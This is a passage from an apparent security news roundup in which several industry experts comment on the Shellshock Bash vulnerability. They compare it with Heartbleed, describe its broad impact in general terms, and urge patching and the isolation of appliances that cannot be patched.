“While Heartbleed eventually became an easy vulnerability to exploit, it was ultimately time consuming, unreliable and rarely resulted in ‘useful’ data output. Shell Shock, however, effectively gives an attacker remote code execution on any impacted host with a much easier means to exploit than Heartbleed and greater potential results for criminals.
Once a web application or similarly afflicted application is found to be vulnerable, an attacker can do anything from download software, to read/write system files, to escalating privilege on the host or across internal networks. More damning, of course, is that the original patch to this issue seems to be flawed and now it’s a race to get a better patch released and deployed before attackers leverage this critical bug.”
Rob Sadowski, Director of Technology Solutions at RSA:
“This is a very challenging vulnerability to manage because the scope of potentially affected systems is very large, and can be exploited in a wide variety of forms across multiple attack surfaces. Further, there is no single obvious signature to help comprehensively detect attempts to exploit the vulnerability, as there are so many apps that access BASH in many different ways.
Because many organizations had to recently manage a vulnerability with similar broad scope in Heartbleed, they may have improved their processes to rapidly identify and remediate affected systems which they can leverage in their efforts here.”
Joe Barrett, Senior Security Consultant, Foreground Security:
“Right now, Shellshock is making people drop everything and scramble to fix patches. Security experts are still expanding the scope of vulnerability, finding more devices and more methods in which this vulnerability can be exploited. But no one has gotten hacked and been able to turn around and point and say ‘It was because of shellshock’ that I’ve seen.
If you have a Linux box, patch it. Now. Do you have a Windows box using Cygwin? Update Cygwin to patch it. And then start trying to categorize all of the ‘other’ devices on the network and determining if they might be vulnerable. Because chances are a lot of them are.
Unfortunately, vendors probably will never release patches to solve this for most appliances, because most [Internet-connected] appliances don’t even provide a way to apply such an update. But for the most part all you can do is try to identify affected boxes and move them behind firewalls and out of the way of anyone’s ability to reach them. Realistically, we’ll probably still be exploiting this bug in penetration tests in 8 years. Not to mention all of the actual bad guys who will be exploiting this.”
Until Next Friday…Have a Great Weekend!
Related Reading: What We Know About Shellshock So Far, and Why the Bash Bug Matters